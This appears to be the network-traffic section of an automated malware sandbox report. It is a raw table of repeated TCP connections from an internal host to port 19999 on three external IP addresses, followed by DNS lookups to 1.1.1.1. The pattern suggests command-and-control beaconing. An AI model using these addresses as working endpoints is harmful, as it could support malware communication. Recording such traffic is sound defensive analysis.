                                                          Jul 25, 2024 12:02:53.843918085 CEST199994976788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:53.844007015 CEST4976719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:54.281881094 CEST4976819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:54.286966085 CEST19999497685.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:54.287060022 CEST4976819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:54.287261963 CEST4976819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:54.292164087 CEST19999497685.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:54.292421103 CEST19999497685.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:54.770224094 CEST4976819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:54.779179096 CEST19999497685.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:54.779232025 CEST4976819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:55.299613953 CEST4976919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:55.311527014 CEST199994976988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:55.311647892 CEST4976919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:55.311777115 CEST4976919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:55.317333937 CEST199994976988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:55.317346096 CEST199994976988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:55.785857916 CEST4976919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:55.794080019 CEST199994976988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:55.794166088 CEST4976919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:56.295542002 CEST4977019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:56.301378012 CEST199994977088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:56.301461935 CEST4977019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:56.301645994 CEST4977019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:56.306461096 CEST199994977088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:56.307643890 CEST199994977088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:56.803117037 CEST4977019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:56.809777021 CEST199994977088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:56.809834957 CEST4977019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:57.404660940 CEST4977119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:57.414568901 CEST199994977188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:57.414719105 CEST4977119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:57.415225029 CEST4977119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:57.423286915 CEST199994977188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:57.423394918 CEST199994977188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:57.801929951 CEST4977119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:57.849936962 CEST199994977188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:57.874010086 CEST199994977188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:57.874106884 CEST4977119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:58.313426018 CEST4977219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:58.318356991 CEST19999497725.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:58.318430901 CEST4977219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:58.318702936 CEST4977219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:58.326740026 CEST19999497725.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:58.326751947 CEST19999497725.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:58.835330009 CEST4977219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:59.045900106 CEST19999497725.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:59.048182011 CEST4977219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:59.360877037 CEST4977319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:59.366529942 CEST19999497735.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:59.370455980 CEST4977319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:59.370663881 CEST4977319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:59.375689030 CEST19999497735.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:59.375869036 CEST19999497735.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:59.848515987 CEST4977319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:00.003123045 CEST19999497735.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:00.003176928 CEST4977319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:00.368000031 CEST4977419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:00.372883081 CEST199994977488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:00.372994900 CEST4977419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:00.373193979 CEST4977419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:00.384330988 CEST199994977488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:00.384382010 CEST199994977488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:00.848557949 CEST4977419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:00.912508965 CEST199994977488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:00.916002035 CEST199994977488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:00.916099072 CEST4977419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:01.513653040 CEST4977519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:01.520170927 CEST199994977588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:01.520292997 CEST4977519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:01.520553112 CEST4977519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:01.526051998 CEST199994977588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:01.526101112 CEST199994977588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:01.863799095 CEST4977519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:01.918997049 CEST199994977588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:02.040569067 CEST199994977588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:02.040646076 CEST4977519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:02.374330997 CEST4977619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:02.379637003 CEST19999497765.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:02.379724026 CEST4977619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:02.379940987 CEST4977619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:02.384850979 CEST19999497765.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:02.386801958 CEST19999497765.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:02.865583897 CEST4977619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:02.924993992 CEST19999497765.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:02.925163984 CEST4977619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:03.377547979 CEST4977719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:03.383110046 CEST19999497775.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:03.383189917 CEST4977719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:03.383342028 CEST4977719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:03.388271093 CEST19999497775.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:03.388667107 CEST19999497775.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:03.864293098 CEST4977719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:03.875540018 CEST19999497775.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:03.875614882 CEST4977719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:04.392271996 CEST4977819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:04.399274111 CEST19999497785.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:04.399357080 CEST4977819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:04.399590015 CEST4977819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:04.404678106 CEST19999497785.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:04.404728889 CEST19999497785.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:04.910857916 CEST4977819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:04.919814110 CEST19999497785.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:04.919900894 CEST4977819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:05.422136068 CEST4977919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:05.429857016 CEST199994977988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:05.429974079 CEST4977919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:05.430093050 CEST4977919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:05.438762903 CEST199994977988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:05.440824032 CEST199994977988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:05.911006927 CEST4977919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:05.935862064 CEST199994977988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:05.936045885 CEST4977919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:06.421067953 CEST4978019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:06.426762104 CEST199994978088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:06.426870108 CEST4978019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:06.427093983 CEST4978019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:06.433018923 CEST199994978088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:06.433868885 CEST199994978088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:06.910835981 CEST4978019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:06.934556961 CEST199994978088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:06.934698105 CEST4978019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:07.508740902 CEST4978119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:07.513696909 CEST19999497815.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:07.513758898 CEST4978119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:07.513901949 CEST4978119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:07.519331932 CEST19999497815.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:07.519479036 CEST19999497815.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:07.911096096 CEST4978119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:07.957933903 CEST19999497815.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:07.983225107 CEST19999497815.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:07.983268976 CEST4978119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:08.438189030 CEST4978219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:08.444808960 CEST19999497825.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:08.445066929 CEST4978219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:08.445066929 CEST4978219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:08.450407982 CEST19999497825.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:08.450472116 CEST19999497825.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:08.926460981 CEST4978219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:08.932647943 CEST19999497825.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:08.932926893 CEST4978219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:09.454319000 CEST4978319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:09.460222006 CEST19999497835.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:09.460314035 CEST4978319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:09.460464001 CEST4978319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:09.467874050 CEST19999497835.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:09.468053102 CEST19999497835.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:09.942101955 CEST4978319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:09.957778931 CEST19999497835.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:09.957849026 CEST4978319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:10.456307888 CEST4978419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:10.461165905 CEST199994978488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:10.461244106 CEST4978419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:10.461509943 CEST4978419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:10.466418028 CEST199994978488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:10.466774940 CEST199994978488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:10.945143938 CEST4978419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:10.950481892 CEST199994978488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:10.950545073 CEST4978419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:11.615618944 CEST4978519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:11.620421886 CEST199994978588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:11.620498896 CEST4978519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:11.621032953 CEST4978519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:11.625916958 CEST199994978588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:11.625966072 CEST199994978588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:12.098268986 CEST4978519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:12.122756958 CEST199994978588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:12.122848034 CEST4978519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:12.608805895 CEST4978619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:12.614170074 CEST199994978688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:12.614278078 CEST4978619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:12.614517927 CEST4978619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:12.620297909 CEST199994978688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:12.622127056 CEST199994978688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:13.098804951 CEST4978619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:13.122124910 CEST199994978688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:13.122261047 CEST4978619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:14.288518906 CEST6515719999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:14.293894053 CEST19999651575.161.70.189192.168.2.4
                                                          Jul 25, 2024 12:03:14.294166088 CEST6515719999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:14.294166088 CEST6515719999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:14.299196005 CEST19999651575.161.70.189192.168.2.4
                                                          Jul 25, 2024 12:03:14.300012112 CEST19999651575.161.70.189192.168.2.4
                                                          Jul 25, 2024 12:03:14.754635096 CEST6515719999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:14.760193110 CEST19999651575.161.70.189192.168.2.4
                                                          Jul 25, 2024 12:03:14.760343075 CEST6515719999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:15.269087076 CEST6515819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:15.274117947 CEST19999651585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:15.274234056 CEST6515819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:15.274579048 CEST6515819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:15.279634953 CEST19999651585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:15.280503988 CEST19999651585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:15.754607916 CEST6515819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:15.808799982 CEST19999651585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:15.815634012 CEST19999651585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:15.815680981 CEST6515819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:16.279284000 CEST6515919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:16.284286976 CEST199996515988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:16.284400940 CEST6515919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:16.284666061 CEST6515919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:16.289629936 CEST199996515988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:16.289870977 CEST199996515988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:16.754633904 CEST6515919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:16.805953026 CEST199996515988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:17.021440983 CEST199996515988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:17.021523952 CEST6515919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:17.353614092 CEST6516019999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:17.360327959 CEST19999651605.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:17.360404968 CEST6516019999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:17.360560894 CEST6516019999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:17.367223024 CEST19999651605.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:17.367372990 CEST19999651605.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:17.848370075 CEST6516019999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:17.853972912 CEST19999651605.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:17.854041100 CEST6516019999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:18.377547026 CEST6516119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:18.382411957 CEST199996516188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:18.382493019 CEST6516119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:18.382654905 CEST6516119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:18.387464046 CEST199996516188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:18.388060093 CEST199996516188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:18.864507914 CEST6516119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:18.870289087 CEST199996516188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:18.871069908 CEST6516119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:19.384439945 CEST6516219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:19.389388084 CEST199996516288.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:19.389467001 CEST6516219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:19.389615059 CEST6516219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:19.394426107 CEST199996516288.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:19.394479990 CEST199996516288.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:19.864017963 CEST6516219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:19.869365931 CEST199996516288.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:19.869442940 CEST6516219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:21.219161987 CEST5866519999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:21.224781036 CEST19999586655.161.70.189192.168.2.4
                                                          Jul 25, 2024 12:03:21.224886894 CEST5866519999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:21.225071907 CEST5866519999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:21.230370998 CEST19999586655.161.70.189192.168.2.4
                                                          Jul 25, 2024 12:03:21.230812073 CEST19999586655.161.70.189192.168.2.4
                                                          Jul 25, 2024 12:03:21.723258018 CEST5866519999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:21.728571892 CEST19999586655.161.70.189192.168.2.4
                                                          Jul 25, 2024 12:03:21.728637934 CEST5866519999192.168.2.45.161.70.189
                                                          Jul 25, 2024 12:03:22.264272928 CEST5866619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:23.350529909 CEST19999586665.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:23.350646019 CEST5866619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:23.453500032 CEST5866719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:23.482388020 CEST199995866788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:23.482542038 CEST5866719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:23.482630968 CEST5866719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:23.496537924 CEST199995866788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:23.496545076 CEST199995866788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:23.817991972 CEST5866719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:23.873972893 CEST199995866788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:24.031333923 CEST199995866788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:24.031421900 CEST5866719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:24.849961042 CEST5866819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:24.854882002 CEST199995866888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:24.854969978 CEST5866819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:24.855468988 CEST5866819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:24.860470057 CEST199995866888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:24.860516071 CEST199995866888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:25.332931995 CEST5866819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:25.342864990 CEST199995866888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:25.342981100 CEST5866819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:26.006201029 CEST5866919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:26.011415005 CEST19999586695.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:26.011528969 CEST5866919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:26.011802912 CEST5866919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:26.016788006 CEST19999586695.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:26.016818047 CEST19999586695.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:26.332736015 CEST5866919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:26.381843090 CEST19999586695.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:26.831635952 CEST19999586695.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:26.831948042 CEST5866919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:26.832730055 CEST19999586695.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:26.832793951 CEST5866919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:26.839267969 CEST19999586695.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:26.846497059 CEST5867019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:26.853914976 CEST199995867088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:26.854120970 CEST5867019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:26.854208946 CEST5867019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:26.859097004 CEST199995867088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:26.859637022 CEST199995867088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:27.332782030 CEST5867019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:27.339840889 CEST199995867088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:27.339893103 CEST5867019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:28.782239914 CEST5867119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:28.787488937 CEST19999586715.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:28.787643909 CEST5867119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:28.788269997 CEST5867119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:28.793391943 CEST19999586715.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:28.793921947 CEST19999586715.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:29.286183119 CEST5867119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:29.303225040 CEST19999586715.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:29.303287029 CEST5867119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:30.634673119 CEST5867219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:30.639698029 CEST199995867288.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:30.640099049 CEST5867219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:30.640268087 CEST5867219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:30.645145893 CEST199995867288.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:30.645370007 CEST199995867288.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:31.161139965 CEST5867219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:31.168179035 CEST199995867288.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:03:31.168272018 CEST5867219999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:03:31.679541111 CEST5867319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:31.686259985 CEST19999586735.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:31.686405897 CEST5867319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:31.686577082 CEST5867319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:31.693135977 CEST19999586735.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:31.703315020 CEST19999586735.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:32.161135912 CEST5867319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:32.191350937 CEST19999586735.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:32.191473007 CEST5867319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:32.715934038 CEST5867419999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:32.742466927 CEST19999586745.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:32.742574930 CEST5867419999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:32.742811918 CEST5867419999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:03:32.750916004 CEST19999586745.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:32.751723051 CEST19999586745.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:33.544603109 CEST19999586745.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:03:33.598150015 CEST5867419999192.168.2.45.75.158.61
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 25, 2024 11:59:27.472111940 CEST5065253192.168.2.41.1.1.1
                                                          Jul 25, 2024 11:59:27.481487989 CEST53506521.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:28.165363073 CEST6066553192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:28.332082033 CEST53606651.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:29.146353960 CEST6122353192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:29.242415905 CEST53612231.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:30.166480064 CEST6105153192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:30.176345110 CEST53610511.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:31.165967941 CEST5814953192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:31.174592018 CEST53581491.1.1.1192.168.2.4
                                                          Jul 25, 2024 12:02:32.161283970 CEST6170653192.168.2.41.1.1.1
                                                          Jul 25, 2024 12:02:32.261459112 CEST53617061.1.1.1192.168.2.4
